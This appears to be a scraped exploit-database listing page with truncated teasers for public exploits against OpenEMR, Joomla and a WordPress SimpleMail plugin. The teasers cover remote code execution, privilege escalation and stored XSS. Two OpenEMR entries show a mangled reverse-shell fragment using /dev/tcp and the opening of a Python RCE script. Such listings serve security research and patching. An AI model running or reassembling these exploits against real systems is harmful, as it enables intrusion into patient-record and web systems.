OpenEMR - Remote Code Execution

OpenEMR versions prior to 5.0.1 suffer from a remote code execution vulnerability. Title: OpenEMR 5.0.1 - Remote Code Execution Exploit Author: Musyoka Ian Date: 2020-05-25 Title: OpenEMR 5.0.1 - Remote Code Execution Vendor Homepage: https://www.open-emr.org/ Software Link:...

OpenEMR 5.0.1 - Remote Code Execution (1)

Title: OpenEMR 5.0.1 - Remote Code Execution 1 Exploit Author: Musyoka Ian Date: 2020-05-25 Title: OpenEMR 5.0.1 - Remote Code Execution Vendor Homepage: https://www.open-emr.org/ Software Link: https://github.com/openemr/openemr/archive/v5013.tar.gz Dockerfile:...

OpenEMR 5.0.1.3 - Arbitrary File Actions Vulnerability

Exploit for linux platform in category web applications Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions Exploit Author: Joshua Fam Twitter : @Insecurity Vendor Homepage: https://www.open-emr.org/ Software Link: https://github.com/openemr/openemr/archive/v5013.tar.gz Version: 5.0.1.3 Teste...

OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)

Title: OpenEMR 5.0.1.3 - Remote Code Execution Authenticated Author: Cody Zacharias Date: 2018-08-07 Vendor Homepage: https://www.open-emr.org/ Software Link: https://github.com/openemr/openemr/archive/v5013.tar.gz Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile...

OpenEMR 5.0.1.3 Remote Code Execution

Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example: http://127.0.0.1/openemr." ap.addargument"-u", "--user",...

OpenEMR < 5.0.1 - Remote Code Execution Exploit

Exploit for php platform in category web applications Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example:...

Joomla 3.4.4 - 3.6.4 - Account Creation / Privilege Escalation Exploit

Exploit for php platform in category web applications Source: https://github.com/XiphosResearch/exploits/tree/master/Joomraa While analysing the recent Joomla exploit in comusers:user.register we came across a problem with the upload whitelisting. They don't allow files containing SetHandler...

wordpress simplemail plugin 1.0.6 - Stored XSS

No description provided by source. !/usr/bin/python ''' Author: loneferret of Offensive Security Product: SimpleMail Version: 1.0.6 free version Vendor Site: http://codecanyon.net/item/wp-simplemail/1130008?ref=tinsley Software Download: http://wordpress.org/extend/plugins/wp-simplemail/ Timeline...

WordPress Plugin simplemail 1.0.6 - Persistent Cross-Site Scripting

!/usr/bin/python ''' Author: loneferret of Offensive Security Product: SimpleMail Version: 1.0.6 free version Vendor Site: http://codecanyon.net/item/wp-simplemail/1130008?ref=tinsley Software Download: http://wordpress.org/extend/plugins/wp-simplemail/ Timeline: 29 May 2012: Vulnerability report...